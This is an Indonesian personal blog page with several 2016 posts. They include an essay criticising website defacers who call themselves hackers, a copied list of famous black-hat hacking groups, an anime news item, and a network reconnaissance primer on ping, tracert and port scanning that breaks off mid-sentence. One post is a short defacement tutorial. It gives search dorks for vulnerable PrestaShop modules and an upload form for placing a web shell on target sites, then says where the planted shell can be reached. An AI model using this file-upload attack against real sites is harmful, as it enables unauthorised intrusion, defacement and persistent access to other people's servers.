Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

3

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

Robin Master Gray Fox...Blogger

Selamat Datang dan selamat belajar :D

mp3 Player

Efek klik kanan

Sabtu, 16 Juli 2016

Catatan Seorang Hacker

Catatan Seorang Hacker

kok lo yang sewot bro..?? mang lo Hacker...??
ane bukan siapa2 my Brotha...
ane cuma seorang mahasiswa yang blum tamat2 karna kesibukan cari sesuap nasi dan sebongkah berlian buat modal wisuda n nikah,,,kwkwkwk...(miris ngingat nasib sendiri)

nah, mending lo mikirin kuliah lo aja, ngapain lo ngurusin kami...
ane : ya juga y,,, :'(

hmm,,,tpi ane g enak banget ngeliat kalian yang merasa jadi hacker, tapi sebenarnya cuma seorang Pecundang.
tau ga klo hacker tu apaan..??
pernah g baca tentang manifesto seorang Hacker..??

tau ga bedanya Cracker ma Hacker...??
atau tau g beda nya seorang Polisi ma Pencuri..??
atau Ilmuwan ma para plagiat..

sekali lagi di sini ane cuma mw berbagi pemikiran, bukan bermaksud untuk menghakimi atau menghujat.
ane cuma mw agan2 smua sadar akan apa yang agan lakukan...jadiah sang ahli, bukan pencuri.
orang ahli itu memperbaiki yang rusak menjadi baik kembali bukan yang baik malah di rusaki dan memajang kata2 cemen n mengaku2 komunitas tertentu. klo agan semua memang hebat, kenapa tidak perbaiki saja kelemahan yang agan temukan tanpa perlu memberi embel2 di belakangnya. untuk apa embel2 itu..?? dan lebih parahnya lagi ninggalin backdoor.-->> buat apa..??
untuk memamerkan komunitas anda hebat..?? atau agar orang yang anda rusak sistem nya itu memanggil/mencari anda agar memperbaikinya...??

sekarang aggap aja ane yang pecundang. ane memang seorang pecundang yang suka akan pengetahuan namun tidak suka merusak. ane pecundang tapi ane suka memperbaiki. tanpa menempel siapa ane atau komunitas ane...

okey, back to the point...
what's the point..??
point nya adalah teman2 semua yang berada di dunia aer yang mengaku2 seorang hacker (secara langsung ataupun tidak langsung) yang bisa nya hanya menjebol sistem atau perangkat dari tutorial dan penjelasan dari orang lain.
dan menempel embel2 atribut pribadi ataupun komunitas tertentu. miris ane liatnya...apalagi klo agan cuma bisa

menggunakan tool2 yang ada (apapun lah itu nama toolsnya). ditambah lagi basic programmingnya NOL besar dan di bawah standar seorang hacker.
kenapa saya mengangkat masalah ini..??
karna saya ingin sedikit memberikan motivasi buat yang keenakan dengan popularitasnya agar mw membuka matanya.

jangan sampe tergilas dengan apa yang agan liat saat ini. ketahuilah banyak hal lagi yang mesti agan pelajari dari dunia aer ini. banyak kebohongan, kemunafikan, penipuan dan lain sebagai nya yang belum anda pahami. banyak konspirasi yang tidak bisa anda lihat.

sekarang mari kita liat tindakan para "Hacker" saat ini.
ada yang lagi perang antar negara. (kwkwkwk, macam betul aja)
berlomba mendeface web,
meng"hack" akun fb orang,
melakukan "penetrasi" sebuah system,
membuat acara seminar "Security",
"membagikan" ebook "hacking", (namun kenyataan nya jualan bro)
atau banyak lagi lainnya yang jauh dari arti sesungguhnya seorang Hacker sejati.
kenapa ane begitu berapi2 dengan masalah panggilan ini..??
apalah arti sebuah panggilan. kan cuma panggilan aja, arti nya ya terserah orang lah.
coba bayangkan klo tentara kita panggil perampok, atau polisi kita panggil Pelacur, atau sebaliknya perampok kita panggil Polisi, atau Maling kita panggil Tentara.
kan tadi kita sepakat apalah artinya sebuah panggilan...jadi gimana menurut agan tentang panggilan...??
apakah hal itu sepele..??
buat agan yang berminat mw jadi hacker ane sech g ngelarang, tapi tolong ente pelajarin dan cari tau dulu siapa itu hacker. apa yang dilakukannya..??

Hacker, kata yang g ngaruh sedikitpun buat kehidupan ane...
tapi kenapa y, kuping ane panas banget ngedengar atau pun membaca..
"wuih,,,hacker ne",
"ada heikel",
"akang hacker ya..??"
atau kalimat2 lain nya yang di pajang di situs2 yang mereka jebol.
"Kami para Hacker dari Komunitas [Antah Berantah]", dengan menempel berbagai kalimat cemen lainnya di sana.
apa kegiatan yang seperti ini yang dijalani sama hacker zaman sekarang...??
apa seorang atau komunitas yang menyebut dirinya Hacker itu sekarang dah suka PAMER..??

kemana para Hacker sejati perginya...??
atau Hacker dah mulai banting stir, karna kurangnya popularitas gara2 selalu bersembunyi...
atau kurang nya pengakuan, jadi membuat suatu gebrakan. agar diakui secara paksa...??
atau anda para hacker semua dah bingung mw ngapain lagi. gara2 banyak yang dah jadi hacker...??

oke, sekarang ane mw menganalogikan ke dunia nyata.
dulu seorang hacker itu selalu berkeliling melihat berbagai rumah maupun gedung. dan berusaha menganalisa secara teliti. apakah bangunan itu memiliki kelemahan atau celah agar dapat disusupi.. setelah ketemu maka sang Hacker akan memperbaikinya atau memberitahukan kepada yang punya bangunan tentang celah tersebut.
tapi sekarang para Hacker, mengganti cara kerja nya (ntah itu Hacker atau cuma seorang Pecundang). mereka berkeliling mencari rumah atau gedung untuk mencari celah masuk (kebanyakan celah yang dipaksakan). setelah mereka mendapatkan celah, mereka akan berusaha masuk. dan saat mereka terkendala maka mereka lari ke forum2 (kumpulan para "Hacker") dan menanyakan kepada Masternya di sana. setelah dapat pencerahan mereka akan kembali ke bangunan tersebut. yup, anggap aja mereka berhasil dan masuk. setelah masuk mereka mengacak2 isi bangunan tersebut dan jika menemukan hal yang penting atau berguna buat mereka, mereka akan mengambilnya. setelah diambil dan puas dengan isi bangunan tersebut mereka memasang spanduk besar, tak jarang spanduk dipasang di depan/halaman bagunan itu. dan meninggalkan/atau membuat pintu ajaib agar bisa masuk kapan2 klo umur panjang.

dari analogi di atas, bisa dilihat beda Hacker dulu sama yang beredar sekarang...
klo ane sech bilang hacker obralan di kaki lima atau hanya seorang amatiran yang ingin keuntungan pribadinya alias MALING.
apa semurah itu harga seorang hacker..??
mana prestise seorang hacker yang pernah harum namanya dulu...??

ane dulu sangat kagum ma aktivitas Hacker. tapi sekarang ane sech jijik ma "Hacker" yang bertebaran bak kain obralan itu ("Hacker" nya pake tanda kutip y Mastah, takut klo2 nti ada Hacker beneran yang baca bisa2 ane kena sumpah pula nti).
buat semua aktivis dunia aer. sebenarnya di sini, Hacker atau bukan nya anda, bukanlah masalah Paling Penting.
namun cara berpikir anda itu lah yang paling penting.
coba lah berpikir lebih dewasa, apa tujuan nya komputer itu anda pakai.
ane pernah bertemu ma orang yang ahli komputer, mulai dari masalah jaringan, program, maupun hardware nya dia ngerti n paham. keluar masuk sistem tu mainannya. oprek software n hardware sampingannya. buat system kerjaannya. ane sangat salut ma dia, ane ngakuin sendiri klo dia baru pantas di sebut hacker. kenapa..?? karna dia selalu melihat sebuah system seperti seorang teman. tidak pernah merusak, namun memperbaiki. dan salut nya ane, smua dilakukan secara secara cuma2 dan bagi nya itu adalah pengetahuan yang ga akan di dapat dari bangku pendidikan manapun. ane pernah liat waktu dia scan sebuah system, g tangung2 system salah satu Bank besar lo. n parah nya bukan dari sisi aplikasi lagi, namun servernya. setelah dia scan dan melakukan beberapa proses dia bisa masuk ke server. yup, kerjaan done. lumayan bentar lah dia kerja, sekitar 4 jam-an, ane sech nungguinnya sambil tiduran n main game, ane ajak ngobrol doi g cuekin ane...tapi setelah berhasil dia manggil ane n jelasin detail bugs yang dia dapat. ane sech mangut2 aja, coz ane g ngerti apa yang di jelasinnya. apalagi prosesnya, banyak koding brother...n tools yang dia punya semua nya created by dia...
trus setelah bugs dapat, dia kirim email ke support bank tadi n kasih penjelasan secara rinci. dan solusi yang harus di ambil.

trus ane tanya ma dia, kenapa g di sedot tu duit nya bro...??
buat apa...?? katanya.
kok duit buat apa...?? gila lo ya... ane sedikit sewot.
dia cuma ketawa dengar ane nyewot gitu.
trus dia bilang, apa untungnya jadi pencuri atau pun pengrusak bro...
lagian ane masih bisa cari duit dari bikin system kok. ini kan cuma sampingan aja, karna g sengaja ngeliat ada kemungkinan bugs. untung yang ane dapat, lebih banyak dari pada ngambil semua uang itu bro. jadi suatu saat saat ane bikin suatu sistem ane dah tau banyak kemungkinan2 untuk masuk ke dalam suatu sistem. kan ane developer bro. jadi wajib tau lah hal ini. n percayalah ilmu yang ente dapat g kan habis, tapi uang yang ente curi pasti akan habis.
ane jadi terdiam mendengar penjelasannya. ane malu, klo ane dah berpikiran bodoh seperti itu. mulai saat itu ane g pernah absen belajar tentang komputer. walau mpe hari ini yang ane tau cuma office word aja (hhhaaaaddeeh).

sekilas mari kita lihat kasus wildan yang marak akhir2 ini ataupun kasus perang deface antar Indonesia dan myanmar. ane sech cuma nonton doank. n ane perhatikan, banyak orang yang dah salah kaprah dalam mengartikan masalah ini. sekali lagi ane bukan bermaksud buat menghujat pribadi atau kelompok, artikel ini ane ketik buat berbagi opini. kan sekarang jamannya kebebasan berpendapat bro, walau masih rancu tu hukumnya kebebasan itu.
oke, kasus pertama. kasus yang terjadi ma saudara kita "Hacker" muda asal pulau jawa sana. banyak yang dukung apa yang dah di buat nya. ane sech ga mihak manapun, cuma klo ente dukung apa yang di buatnya. ente salah besar dan dah terjerumus ma konspirasi yang ada. gitu juga ma si wildan. setelah tertangkap semuanya pada berdalih klo g ada "dia" pemerintah g akan tau bugs yang ada di sistem itu. yah, miris bro. pemerintah di bandingkan ma seorang "penjaga warnet" yang bertopeng ma popularitas nya Hacker. ente tau g struktural kementrian Komunikasi dan Informasi..?? dari mentri mpe paling bawah struktur nya gmn..??
sadar g klo di dalam nya banyak profesor2 yang berkecimpung d sana. eeiitts..tunggu dulu brotha, jangan buru2 ditutup, ane blum selesai.
jadi secara g langsung kita dah meremehkan para ahli yang ngajar kita selama ini (khusus buat yang kuliah di dunia IT). so, apa kalian dah sehebat atau lebih hebat dari mereka..??
apa yang kalian dah perbuat untuk negara atau sekurang2 nya masyarakat..??
yang ada kalian cuma keluar masuk sistem yang lemah dan memamerkan kebolehan dengan memajang spanduk2 cemen.
oke, buat wildan. coba ente bayangkan, yang di rusak nya (atau lebih halus di "Hack") g tanggung2 yaitu web nya pak Presiden. sadar g tu anak...??
mang presiden tu buat mainan...?? sekarang setelah ketahuan berdalih hanya sekedar mentest system...
apakah mentest dengan cara memasang spanduk...??
ada juga para pendukung nya membandingkan kasus wildan dengan para koruptor, kenapa begini kenapa begitu...
lucu sangat lah bro, klo ente berpikiran picik seperti itu...
oke, koruptor mang MALING, namun Wildan lebih dari MALING menurut ane. (Menurut ane BRO)...
kenapa koruptor begitu susah di tangkap..?? karna dia pinter.
kenapa hukuman nya begitu ringan..?? karna dia kaya n terkenal.
kenapa wildan cepat kali ketangkep..?? karna Wildan nya BODOH.
nah lo, berani amat y ane...?? maaf y para mastah, ini kan cuma opini, jangan di masukin ke dalam hati ya... kenapa bodoh..?? jelas2 web tu web pak presiden, pasti pengawal nya buanyak bro, ehh, dianya malah majang2 spanduk...
kwkwkwk....dari sini aja keliatan klo dia g pake analisis masuk ke dalam sistem.

kenapa di tangkap, n kenapa g di manfaatin sumber daya nya dia...??
apa yang mw di manfaatin...?? kemampuannya masih NOL besar brotha...masih bayi dia, ga da yang bisa di ambil/ di manfaatin dari dia. n yang di lakukan nya tu adalah Penghinaan terhadap Pak Presiden, Orang no 1.
malang lah pokoknya. maka nya klo mw berbuat di pikir2 dulu, jangan enak nya aja yang di rasa.
hhmmmm,,,mungkin cuma itu sekarang yang bisa ane tulis. ini sebuah opini. g da maksud ane yang lain.
klo mw percaya, silahkan, klo g y terserah anda.
tapi intinya, sebelum anda/agan2 semua menyebut/membawa2 nama hacker, pikirkan dulu siapa anda...??
klo menurut ane sech jangan kecepatan merasa jadi hacker, tapi belajar aja dulu yang rajin.
n klo bisa jangan lagi jadi Pecundang.
tapi semua itu balek ke diri agan2 juga, apa yang mw agan lakukan pilihannya ada ma agan. buat kasus

Rabu, 13 Juli 2016

10 Grup Hacker Terbaik Di Dunia

  Sekarang saya Ngesahare Grup" Hacker Terbaik Di Dunia , Walaupun hsil Copas 

Dari Web Lain :v . Langsung Aja Baca Artikel Di Bwah Ini. 

cekidot!!!!

Sekilas Mengenai White Hacker dan Black Hat Hacker
Beberapa dari Anda mungkin sudah mengetahui bahwa kata hacker yang kita kenal sebagai "penjahat yang menyerang keamanan dunia digital" sebenarnya kurang tepat. Istilah yang benar adalah cracker dan hacker adalah sebenarnya merupakan si "polisi". Namun karena kata hacker sudah sangat umum maka asumsi dunia tidak mungkin diubah. Hal ini menyebabkan hacker dibagi menjadi 2, yakni white hat hacker dan black hat hacker.
White hat hacker adalah mereka yang dipekerjakan oleh sebuah perusahaan dengan tugas spesifik mencari kelalaian dalam keamanan digital dan membetulkan hal tersebut. Sedangkan black hat hacker adalah mereka yang secara sengaja melakukan pembobolan terhadap keamanan digital dengan alasan tertentu atau bahkan dapat bersifat personal. Daftar berikut ini adalah daftar grup atau perkumpulan hacker black hat paling terkenal dunia.

10. Global kOS
Ilustrasi Hacker
seperti arti nama mereka, Global kOS (dibaca "chaos" yang berarti "kekacauan"), bertujuan untuk menciptakan sebanyak mungkin kekacauan online yang dapat disebut dalam lingkup dunia atau global. Grup ini bertanggungjawab atas banyaknya alat-alat hacker otomatis yang ada di komunitas online, yakni sebuah kode yang dapat dijalankan dengan mudah tanpa perlu pengetahuan teknikal dan penyerangan dapat dengan mudah dilakukan.
Dibentuk pada tahun 1996 oleh seseorang dengan nama user AcidAngel, penyerangan telah dilakukan terhadap lebih dari 40 politisi, MTV dan Ku Klux Klan.

9. Level Seven Crew
Gambaran Hacker
Nama grup Level Seven Crew ini dipercaya didapatkan dari nama neraka tingkat 7 pada syair terkenal Dante Alighieri, "The Inferno." Hanya dari tahun 1999 saja, Level Seven telah berhasil memasuki lebih dari 60 sistem komputer termasuk di dalamnya adalah NASA, Bank Nasional Amerika, dan Hotel Sheraton.
Mereka juga merupakan grup yang terkenal atas aksi penyerangan mereka terhadap Kedutaan Amerika di Cina, dengan motif protes terhadap kesalahan pengemboman US terhadap kedutaan Cina. Kebanyakan tindakan mereka berdasar atas tindakan "hacktivism," yakni sebuah bentuk aktivisme online yang di luar dari tujuan pribadi. Walaupun pada tahun 2000 grup ini dibubarkan, pada 10 Februari 2013, grup ini dibentuk kembali.

8. globalHell
Global Hell
Grup hacker GlobalHell dapat dibandingkan dengan sebuah geng preman, bedanya tindakan mereka tidak dilakukan di jalan namun di dunia cyber. Dikatakan bahwa grup ini telah berhasil menyerang dan menghancurkan lebih dari 115 situs web, menyebabkan kerugian sebesar jutaan US Dollar dan memperjualbelikan informasi rahasia yang berhasil mereka curi.
Ironisnya, globalHell ternyata memang di-cofounder oleh salah satu anggota geng ternama Houston, US, yakni Patrick Gregory. Ia menjadikan komputer sebagai "jalan keluarnya" untuk kehidupan geng yang ia jalankan sebelumkan. Di sana ia mengkoordinasi lebih dari 60 anggota hacker.
Pada tahun 1999, co-founder Chad Davis ditangkap dengan hukuman penjara 6 bulan dan harus membayar kerugian sebesar 8.054 US Dollar atau setara dengan sekitar 96 Juta Rupiah. Ia berhasil mengganti kerugian tersebut sejak ia bekerja menjadi konsultan keamanan independen.

7. TeaMp0isoN
TeaMp0isoN
Seorang remaja berumur 16 tahun dengan nama user TriCk membentuk TeaMp0isoN pada tahun 2010. Grup ini bertanggung jawab atas penyerangan terhadap Facebook, NATO, dan Research In Motion (RIM) / BlackBerry. Mereka juga menyerang email mantan Perdana Menteri Inggris, Tony Baliar.
Motivasi grup ini adalah berbasis politik dengan dasar berusaha mengekspos pemerintahan internasional yang berusaha menyembunyikan kesalahan mereka. Grup ini juga melakukan tindakan penyerangan terhadap hotline Anti-Terorisme Inggris dengan membut telepon-telepon palsu yang terus berbunyi selama 24 jam (1 hari) sebagai bentuk protes terhadap ekstradisi tersangka teroris di US. 2 hari sesudah tindakan ini, pihak berwajib menangkap 2 remaja yang berumur 16 dan 17 tahun dan didakwa bersalah atas pelanggaran 2 hukum digital.

6. UGNazi
UGNazi
Underground Nazi Haktivist Group atau singkatnya dikenal sebagi UGNazi adalah grup hacker black hat yang terkenal atas tindakan penyerangan mereka terhadap beberapa situs pemerintahan Amerika. Aktivitas mereka sering berkaitan dengan membocorkan informasi pribadi dari berbagai pejabat pemerintahan.
Beberapa serangan mereka adalah terhadap Google, 4Chan, HostGator, Twitter, Departemen Militer Washington, dan banyak lainnya. Sesudah melakukan penyerangan terhadap Departemen Militer Washington, salah sat anggota UGNazi yang membocorkan informasi akun 17 user, termasuk di dalamnya adminstrator website, mengatakan ke SoftPedia: "Ini adalah lanjutan dari serangan kami terhadap wa.gov, terlepas dari hal ini, seperti yang kami katakan kami belum selesai dengan pemerintahan atau siapapun. Kami akan terus datang hingga setiap 'penjahat' yang dapat kami ketahui."

5. Network Crack Program Hacker Group (NCPH)
Tan Dailin AKA Wicked Rose
NCPH dibentuk pada tahun 1994 di Zigong, Cina. Diketahui pada tahun 2006, memiliki anggota 10 orang dengan 4 orang menjadi pemain utama dari grup ini dan pemimpinnya adalah hacker yang memiliki nama user Wicked Rose (diketahui nama aslinya adalah Tan Dailin). Seberapa besarnya grup sekarang ini sendiri tidak diketahui secara jelas.
Dimulai dari penyerangan terhadap banyak situs web asosiasi hacker Cina lainnya, hingga pada tahun 2006, melalui software buatan Wicked Rose, GinWui Rootkit, digunakan untuk menyerang Departemen Ketahanan Amerika. Pada akhir tahun itu, konsultasi keamanan Internet iDefense mengatakan grup ini telah melakukan penyerangan online yang dapat dikatakan berdampak besar.
Berdasarkan Wicked Rose, Network Crack Program Hacker Group (NCPH) ini ternyata dibayar atas pekerjaan mereka oleh sponsor misterius. Pada awalnya dibayar sebanyak 2000 Yuan per bulan atau setara dengan sekitar 3,9 Juta Rupiah, namun sejak penyerangan tahun 2006, diketahui bayaran tersebut meningkat hingga 5000 Yuan atau setara dengan sekitar 9,8 Juta Rupiah setiap bulannya.

4. LulzSec
LulzSec
Pada awalnya hanya beranggotakan 6 orang dan dibentuk pada tahun 2011, tepatnya pada tanggal 15 Mei. Nama LulzSec sendiri didapatkan dari slang Internet 'LOL' yang artinya tertawa terbahak-bahak. Salah satu moto LulzSec adalah "Menertawakan keamanan Anda sejak tahun 2011." 
Grup ini senang memperlihatkan kelalaian keamanan dan target-target mereka mencakup Fox.com, X-Factor, Sony, Nintendo, CIA, dan FBI. Dilaporkan bahwa penyerangan mereka telah menyebabkan kerugian miliaran US Dollar. Selain penyerangan-penyerangan ini, serangan-serangan mereka juga mencakup Bethesda Game Studios, Minecraft, League of Legends dan majalah online The Escapist.
Walaupun pada 26 Juni 2011, grup ini mengatakan bahwa mereka membubarkan diri mereka dengan merilis pernyataan '50 hari Lulz', ada sebuah situs bernama lulzsecurity.org, yang mengatakan bahwa LulzSec "lahir kembali." Dipercaya beberapa anggota LulzSec masih aktif hingga saat ini.

3. Masters of Deception
MOD Master of Deception
Merupakan grup hakcer New York yang dibentuk pada tahun 1989 dengan nama sebagai bentuk persaingan terhadap grup hacker di Texas. Untuk menunjukkan kekuatan mereka, anggota-anggota Masterof Deception melakukan tindakan penyerangan yang disebut sebagai "salah satu tindakan pencurian informasi komputer terbesar yang pernah diketahui."
Mereka membobol server yang terkenal solid dan berhasil mencuri berbagai informasi rahasia seperti salah satunya daftar transaksi kartu kredit miliki artis Julia Roberts, selain itu mereka juga berhasil membobol sistem komputer AT&T (perusahaan multinasional Amerika ternama dalam bidang telekomunikasi) dan mendapatkan berbagai nomor kartu kredit. Semua informasi rahasia itu dilaporkan dijual.
Kejayaan Master of Deception berakhir saat FBI dan Secret Service melakukan penangkapan atas tindakan mereka dan pada penangkapan tersebut 5 hacker terbaik grup itu berhasil ditangkap. Penangkapan ini berakhir dengan 5 tuntutan kejahatan digital yang semuanya terbukti bersalah.

2. Milw0rm ;)
MilW0rm
Pada tahun 1998, sebuah grup hacktivis, MilW0rm, menyerang fasilitas riset nuklir utama milik India yakni Bhabha Atomic Reserach Center (BARC) sebagai protes anti-nuklir mereka. Beroperasi dari UK, US, Russia dan New Zealand, mereka berhasil membobol firewall fasilitas tersebut, mendapatkan email dan data riset terbaru, menghapus bersih data 2 dari 8 server yang ada, dan menulis pesan anti-nuclear pada situs web mereka. Hal ini sangatlah berdampak besar dan semua institusi serupa langsung meningkatkan keamanan mereka.
Yang mengagumkan adalah tindakan penyerangan tersebut memiliki anggota yang hanya berumur 15 tahun. 1 Bulan dari kejadian itu, nama MilW0rm lebih dikenal lagi karena berhasil menyerang perusahaan hosting EasySpace yang hanya dalam waktu 1 jam pesan anti-nuklir muncul di 300 situs web lainnya, termasuk di dalamnya adalah FIFA World Cup, Wibledon, Ritz Hotel, Keluarga Kerajaan Saudi.

1. Anonymous
Anonymous
Anonymous adalah grup hacker raksasa yang pada tahun 2012 memiliki anggota lebih dari 5.500 orang. Situs-situs digital yang pernah mereka serang adalah situs web FBI, departemen pertahanan, PayPal, MasterCard, Visa, Sony PlayStation network dan banyak lainnya. Bahkan mereka juga pernah mengancam Pentagon, Facebook, serta grup kartel narkoba Meksiko "Los Zetas". Mereka dikenal dengan atribut topeng Guy Fawkes, yakni topeng seperti pada film V for Vendetta.
Salah satu aksi mereka yang paling terkenal adalah saat mereka melakukan hacking ke jaringan Sony PlayStation, dengan motif melakukan protes atas gugatan hukum terhadap Geohot. Gehot adalah hacker yang berhasil membobol atau melakukan jailbreak terhadap sistem PS3 dan memperlihatkan proses tersebut di video pada YouTube. Yang membuat perkara ini menjadi besar dan membuat Anonymous bertindak adalah karena selain gugatan hukum, Sony meminta YouTube memperlihatkan IP Address dari semua orang yang menonton video tersebut. Banyak orang menganggap ini adalah tindakan pelanggaran privasi termasuk grup Anonymous.
Beberapa dari Anda mungkin pernah mendengar Anonymous Indonesia, namun pihak Anonymous mengatakan mereka sama sekali tidak terlibat dengan pihak Anonymous dari Indonesia. Moto grup ini adalah "Kami adalah Anonymous. Kami adalah Pasukan. Kami tidak memaafkan. Kami tidak melupakan. Tunggu Kami." Time bahkan menyebut grup ini sebagai salah satu grup dalam daftar "100 orang paling berpengaruh di dunia."
--
Ketahuilah bahwa black-hat hacker selalu memiliki resiko untuk ditangkap secara legal oleh pihak berwajib terkait atas tindakan mereka. Hal ini juga pernah terjadi pada 14 anggota Anonymous yang berhasil ditangkap FBI dari 1000 daftar IP Address, atas penyerangan mereka terhadap PayPal.

Source : http://www.tahupedia.com/ < hsil copas

Selasa, 05 Juli 2016

Anak Jalanan Versi Anime

Sukses Besar, Anak Jalanan Versi Anime Bakal Segera Tayang!

petisi agar sinetron anak jalanan berhenti tayangTweet on Twitter

Anak Jalanan Versi Anime ini membidik penonton usia muda

Walaupun sinetron Anak Jalanan menuai krtitik, namun tidak dipungkiri sinetron Indonesia ini memiliki rating yang tinggi. Tidak pelak jika judul ini masih menjual di mata masyarakat. Seperti memanfaatkan momen ini, sinetron RCTI ini pun akan membuat judul lainnya yaitu Anak Jalanan versi anime!
Sinetron-Anak-Jalanan
Semenjak perilisannya, sinetron Anak Jalanan berhasil menyita perhatian publik Indonesia. Sinetron ini digemari oleh berbagai kalangan dari usia muda hingga dewasa. Tidak heran mengingat sinertron ini tayang pada jam “prime time” dimana waktu yang tepat bagi anak muda beristirahat dari kesibukannya, dan sinetron ini pun hadir di waktu tersebut.
Anak jalanan RCTI 2
Terlepas dari surat teguran KPI dan petisi, sinetron ‘Anak Jalanan’ yang baru menambah pemain baru seperti Jonathan Frizzy dan Roger Danuarta, masih terus merajai rating acara TV nasional. Dari laporan Data All per 14 Februari 2016 lalu, sinetron ini mendapat TVR 9,9 poin dengan share 38,2 persen.
Sinetron ini telah membuat acuan baru bagi hal-hal “gaul” dan “keren” untuk para remaja Indonesia. Bahkan peminatnya mencapai usia muda. Maka tidak heran membuat versi anime dari sinetron Anak Jalanan menjadi salah satu cara merangkul penonton yang lebih luas lagi.
anak jalanan (6)
Anak Jalanan versi anime ini akan bekerja sama dengan merk sepeda motor terkemuka dari Jepang, sehingga motor-motor yang tampil di sinetron aslinya mungkin tidak akan muncul di anime nya. Namun pemirsa tetap akan disuguhi motor-motor Jepang yang tidak kalah canggihnya dengan motor yang hadir pada versi sinetronnyaanak jalanan (5)
Namun untuk menyesuaikan dengan skenario yang baru, akan ada beberapa karakter dari sinetron Anak Jalanan yang akan diganti. Nantinya anime ini akan lebih banyak memunculkan karakter perempuan untuk menjaring pemirsa yang lebih luas lagi. Belum diketahui tokoh mana saja yang akan diganti dan karakter penggantinya juga memiliki peran sebagai siapa.
anak jalanan (4) anak jalanan (2) anak jalanan (1)
Melihat dari beberapa tokoh yang akan diganti, anime ini bukan merupakan adaptasi dari sinetronnya, namun anime ini akan menjadi spin-off dari versi sinetron nya. Tidak aneh jika kita tetap akan melihat karakter dari sinetron orisinalnya kembali muncul di anime nya. Bahkan beberapa cameo konon juga akan muncul di anime ini.
anak jalanan (3)
Gak main-main, anime ini akan digarap oleh studio Pierrot. Tentunya para fans anime sudah tidak asing lagi dengan kualitas studio Pierrot dalam menggarap anime Naruto! Tentunya anime Anak Jalanan ini juga akan digarap sama seriusnya dengan Naruto!
Anak Jalanan versi anime akan tayang pada 1 April 2017.
SUMBER : Duniaku.net

Kamis, 30 Juni 2016

Deface Warehouse Prestashop Arbitrary File Upload

Dork : inurl:/modules/columnadverts/
       inurl://modules/simpleslideshow/
       inurl://modules/homepageadvertise/
       inurl://modules/productpageadverts/

CSRF :
<form method="POST" action="site/path"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>

Kalo ada Tulisan "Eror" Brarti Vuln !

Upload shell di CSRF :v
Akses shell ?? Use Your Brain :)
Tenang di kasih tau kok : http://targetsuka.co.li/[path]/modules/columnadverts/slides/namashell

Rabu, 29 Juni 2016

Attack a Network

Sumber Millw0rm
Ways To Attack a Network:
Ping
The IP address gives the attacker’s Internet address. The numerical address like 212.214.172.81 does not reveal much. You can use PING to convert the address into a domain name in WINDOWS: The Domain Name Service (DNS) protocol reveals the matching domain name. PING stands for “Packet Internet Groper” and is delivered with practically every
Internet compatible system, including all current Windows versions.
Make sure you are logged on to the net. Open the DOS shell and enter
the following PING command:
Ping –a 123.123.12.1
Ping will search the domain name and reveal it. You will often have information on the provider the attacker uses e.g.:
dialup21982.gateway123.provider.com
Pinging is normally the first step involved in hacking the target. Ping uses
ICMP (Internet Control Messaging Protocol) to determine whether the target host is reachable or not. Ping sends out ICMP Echo packets to the target host, if the target host is alive it would respond back with ICMP
Echo reply packets.
All the versions of Windows also contain the ping tool. To ping a remote host follow the procedure below.
Click Start and then click Run. Now type ping <ip address or hostname>
(For example: ping yahoo.com)
This means that the attacker logged on using “provider.com”.
Unfortunately, there are several IP addresses that cannot be converted
into domain names.
For more parameter that could be used with the ping command, go to
DOS prompt and type ping /?.

Ping Sweep
If you are undetermined about your target and just want a live system, ping sweep is the solution for you. Ping sweep also uses ICMP to scan for live systems in the specified range of IP addresses. Though Ping sweep is similar to ping but reduces the time involved in pinging a range of IP addresses. Nmap (http://www.insecure.org) also contains an option
to perform ping sweeps.
Tracert:
Tracert is another interesting tool available to find more interesting information about a remote host. Tracert also uses ICMP.
Tracert helps you to find out some information about the systems involved in sending data (packets) from source to destination. To perform a tracert follow the procedure below.
Tracer connects to the computer whose IP has been entered and reveals all stations starting from your Internet connection. Both the IP address as well as the domain name (if available) is displayed.
If PING cannot reveal a name, Traceroute will possibly deliver the name of the last or second last station to the attacker, which may enable conclusions concerning the name of the provider used by the attacker and the region from which the attacks are coming.
Go to DOS prompt and type tracert <destination address>
(For example: tracert yahoo.com).
But there are some tools available like Visual Traceroute which help you
even to find the geographical location of the routers involved.
http://www.visualware.com/visualroute

Port Scanning:-
After you have determined that your target system is alive the next important step would be to perform a port scan on the target system.
There are a wide range of port scanners available for free. But many of them uses outdated techniques for port scanning which could be easily recognized by the network administrator. Personally I like to use Nmap (http://www.insecure.org) which has a wide range of options. You can download the NmapWin and its source code from:
http://www.sourceforge.net/projects/nmapwin.


Apart from port scanning Nmap is capable of identifying the Operating system being used, Version numbers of various services running,
firewalls being used and a lot more.
Common ports:
Below is a list of some common ports and the respective services
running on the ports.
20 FTP data (File Transfer Protocol)
21 FTP (File Transfer Protocol)
22 SSH
23 Telnet
25 SMTP (Simple Mail Transfer Protocol)
53 DNS (Domain Name Service)
68 DHCP (Dynamic host Configuration Protocol)
79 Finger
80 HTTP
110 POP3 (Post Office Protocol, version 3)
137 NetBIOS-ns
138 NetBIOS-dgm
139 NetBIOS
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
389 LDAP
443 SSL (Secure Socket Layer)
445 SMB (NetBIOS over TCP)
Besides the above ports they are even some ports known as Trojan
ports used by Trojans that allow remote access to that system.

Vulnerability Scanning:
Every operating system or the services will have some vulnerabilities due to the
programming errors. These vulnerabilities are crucial for a successful hack. Bugtraq is
an excellent mailing list discussing the vulnerabilities in the various system. The
exploit code writers write exploit codes to exploit these vulnerabilities existing in a system.
There are a number of vulnerability scanners available to scan the host for known vulnerabilities. These vulnerability scanners are very important for a network administrator to audit the network security.
Some of such vulnerability scanners include Shadow Security Scanner,Stealth HTTP Scanner, Nessus, etc. Visit
http://www.securityfocus.com vulnerabilities and exploit codes of various
operating systems. Packet storm security
(http://www.packetstormsecurity.com) is also a nice pick.

Tools Descriptions:
1. Nmap
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (Network Mapper) is a free open source utility for network exploration
or security auditing. It was designed to rapidly scan large networks, although
it works fine against single hosts. Nmap uses raw IP packets in novel ways to
determine what hosts are available on the network, what services (application
name and version) those hosts are offering, what operating systems (and OS
versions) they are running, what type of packet filters/firewalls are in use,
and dozens of other characteristics. Nmap runs on most types of computers and
